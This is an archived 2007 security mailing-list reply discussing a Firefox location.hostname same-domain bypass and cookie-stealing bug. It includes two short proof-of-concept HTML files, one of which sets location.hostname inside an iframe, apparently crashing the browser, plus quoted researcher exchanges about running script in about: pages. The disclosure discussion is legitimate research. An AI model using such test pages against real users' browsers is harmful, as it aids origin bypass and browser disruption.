Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability

To: "Michal Zalewski" <lcamtuf@xxxxxxxxxxxx>
Subject: Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
From: "pdp (architect)" <pdp.gnucitizen@xxxxxxxxxxxxxx>
Date: Thu, 15 Feb 2007 15:25:12 +0000
Cc: bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx
Domainkey-signature: a=rsa-sha1; c=nofws; d=googlemail.com; s=beta; h=received:message-id:date:from:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=fV3gMZ7rkPibc3MsDOVlwp10nRQ9JwZUmbBpgkYaTDXBmtZHMLUJUUJ2HXLfYbwmB1zJwUknkHFxpBHVwBw2DRX2eo1Fg+cWtzSuPbDksBuTV5U0Q7lp/WG2+rRaYtI4Xd/bbuHOpNCfJVg/q8hH4w2ekOiGPSKGkMkdENC80EQ=
In-reply-to: <6905b1570702150717o7ba39eabyf6d22cac23974fef@xxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <Pine.LNX.4.58.0702142208470.5750@dione> <6905b1570702150631v16a00f2aka04beb9f13c546b5@xxxxxxxxxxxxxx> <Pine.LNX.4.58.0702151556500.5750@dione> <6905b1570702150717o7ba39eabyf6d22cac23974fef@xxxxxxxxxxxxxx>

weird, firefox slowly dies out

t2.html
<html>
        <body>
                <iframe src="t1.html"></iframe>
        </body>
</html>

t1.html
<html>
        <body>
                <script>location.hostname="blog.com";</script>
        </body>
</html>


On 2/15/07, pdp (architect) <pdp.gnucitizen@xxxxxxxxxxxxxx> wrote:

the first one runs in about:blank which is restricted. the second one
is very interesting but still not very useful because it acts like
about:blank. hmmm it seams that the hostname field has been seriously
overlooked.

On 2/15/07, Michal Zalewski <lcamtuf@xxxxxxxxxxxx> wrote:
> On Thu, 15 Feb 2007, pdp (architect) wrote:
>
> > I wander whether we can execute code on about:config or about:cache.
>
> Actually, there are several odd problems related to location updates and
> location.hostname specifically, including one scenario that apparently
> makes the script run with document.location in about: namespace.
>
> I did not research them any further, so I can't say if they're
> exploitable - but you can see a demo here, feel free to poke around:
>
>   http://lcamtuf.coredump.cx/fftests.html
>
> Cheers,
> /mz
> http://lcamtuf.coredump.cx/
>


--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

Follow-Ups:
- Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
  - From: Base64

References:
- Firefox: serious cookie stealing / same-domain bypass vulnerability
  - From: Michal Zalewski
- Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
  - From: pdp (architect)
- Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
  - From: Michal Zalewski
- Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
  - From: pdp (architect)

Prev by Date: Re: Re: Solaris telnet vulnberability - how many on your network?
Next by Date: RE: Re[2]: Solaris telnet vulnberability - how many on your network?
Previous by thread: Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
Next by thread: Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
Index(es):
- Date
- Thread